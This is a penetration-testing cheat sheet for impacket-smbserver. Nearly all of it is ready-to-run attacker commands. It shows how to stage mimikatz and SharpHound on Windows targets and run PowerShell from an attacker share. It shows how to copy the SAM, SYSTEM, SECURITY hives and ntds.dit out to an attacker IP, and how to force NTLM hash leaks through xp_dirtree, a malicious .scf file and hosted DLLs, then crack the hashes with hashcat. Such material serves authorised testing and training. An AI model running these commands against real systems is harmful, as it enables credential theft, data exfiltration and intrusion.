Overview
impacket-smbserver spins up a lightweight SMB server on your attack box. Primary uses:
- Transfer files to/from Windows targets
- Capture NTLM hashes from incoming connections
- Host DLLs or payloads for UNC path injection attacks
No domain or Windows OS required — runs anywhere Python and Impacket are installed.
Basic Usage
Host a directory as an SMB share.
# Share the current directory as "SHARE"
impacket-smbserver SHARE $(pwd)
# Share a specific directory
impacket-smbserver SHARE /tmp/tools
# Listen on a specific interface
impacket-smbserver SHARE /tmp/tools -ip 10.10.14.5
# List the share
dir \\10.10.14.5\SHARE
# Copy a file from attacker
copy \\10.10.14.5\SHARE\nc.exe C:\temp\nc.exe
With SMB2 Support (-smb2support)
Modern Windows versions block SMBv1 by default. Always use -smb2support.
impacket-smbserver SHARE /tmp/tools -smb2support
With Authentication (-username, -password)
Some Windows policies block guest/anonymous SMB access. Add credentials to bypass this.
impacket-smbserver SHARE /tmp/tools -smb2support -username user -password pass
# Mount with credentials
net use Z: \\10.10.14.5\SHARE /user:user pass
# Or use the share directly
copy \\10.10.14.5\SHARE\payload.exe C:\temp\payload.exe
# Disconnect when done
net use Z: /delete
Serving Files to Windows Targets
Direct Copy
# On attacker
impacket-smbserver SHARE /tmp/tools -smb2support
# On target — copy individual files
copy \\10.10.14.5\SHARE\mimikatz.exe C:\temp\
copy \\10.10.14.5\SHARE\SharpHound.exe C:\temp\
# Run directly from share (no copy to disk)
\\10.10.14.5\SHARE\SharpHound.exe -c All
Execute In-Memory (PowerShell)
# Load a script from the share
. \\10.10.14.5\SHARE\PowerView.ps1
# Or via IEX
IEX (Get-Content \\10.10.14.5\SHARE\script.ps1 -Raw)
Receiving Files from Windows Targets (Exfiltration)
# On attacker — share a writable directory
mkdir /tmp/loot
impacket-smbserver SHARE /tmp/loot -smb2support
# On target — copy files to attacker
copy C:\Users\Admin\Desktop\secrets.txt \\10.10.14.5\SHARE\
copy C:\Windows\NTDS\ntds.dit \\10.10.14.5\SHARE\
copy C:\Windows\System32\config\SAM \\10.10.14.5\SHARE\
copy C:\Windows\System32\config\SYSTEM \\10.10.14.5\SHARE\
# Dump registry hives and exfil
reg save HKLM\SAM \\10.10.14.5\SHARE\SAM
reg save HKLM\SYSTEM \\10.10.14.5\SHARE\SYSTEM
reg save HKLM\SECURITY \\10.10.14.5\SHARE\SECURITY
Capturing NTLM Hashes
Any Windows host that connects to your SMB server sends NTLM authentication. The hashes are printed to stdout — save them for offline cracking.
# Start the server and watch for hashes
impacket-smbserver SHARE /tmp/tools -smb2support
# Any UNC path access triggers NTLM auth
dir \\10.10.14.5\SHARE
type \\10.10.14.5\SHARE\test.txt
user::DOMAIN:challenge:response:blob
hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt
DLL Hosting / UNC Path Injection
Host a malicious DLL on your SMB server, then trigger a vulnerable application to load it via a UNC path.
# Host the DLL
impacket-smbserver SHARE /tmp/payloads -smb2support
# DLL hijacking via PATH
\\10.10.14.5\SHARE\evil.dll
# Responder/LLMNR poisoning → DLL load
# Office macro UNC reference
# Web application SSRF to UNC → hash capture
# SQL injection → xp_dirtree('\\10.10.14.5\SHARE')
MSSQL Hash Capture via xp_dirtree
EXEC xp_dirtree '\\10.10.14.5\SHARE', 1, 1;
Shortcut File (.lnk / .scf) for Hash Capture
Place a malicious .scf file on a writable share the victim browses:
[Shell]
Command=2
IconFile=\\10.10.14.5\SHARE\icon.ico
[Taskbar]
Command=ToggleDesktop
The .scf icon auto-load trick is patched on modern Windows (Windows 10 / Server 2019+ by default; Windows 7/8/Server 2008–2016 after the Aug 2024 patch). On up-to-date hosts, browsing the folder no longer triggers auth — use other coercion file formats (.library-ms, .url, .lnk with a UNC icon) where still applicable.
Common Use Cases in Pentest Workflow
| Scenario | Setup |
|---|
| Transfer tools to target | Host /tools dir, copy from target |
| Exfil SAM/SYSTEM/ntds.dit | Share writable dir, reg save to UNC |
| Capture hashes (no Responder) | Trigger UNC path access from target |
| Run exe from share (fileless) | \\attacker\SHARE\tool.exe |
| Load PowerShell from share | . \\attacker\SHARE\script.ps1 |
| DLL sideloading | Host DLL, point vulnerable app to UNC |
| Relay hash capture + crack | Combine with ntlmrelayx or standalone |
Quick Reference
| Task | Command |
|---|
| Basic share | impacket-smbserver SHARE /path |
| SMB2 (required for Win10+) | impacket-smbserver SHARE /path -smb2support |
| With auth | impacket-smbserver SHARE /path -smb2support -username user -password pass |
| Bind to IP | impacket-smbserver SHARE /path -smb2support -ip 10.10.14.5 |
| Custom port | impacket-smbserver SHARE /path -smb2support -port 4445 |
| Copy from attacker | copy \\ATTACKER_IP\SHARE\file.exe C:\temp\ |
| Copy to attacker | copy C:\file.txt \\ATTACKER_IP\SHARE\ |
| Mount share | net use Z: \\ATTACKER_IP\SHARE /user:user pass |
| Run from share | \\ATTACKER_IP\SHARE\tool.exe |
| Crack captured hashes | hashcat -m 5600 hashes.txt wordlist.txt |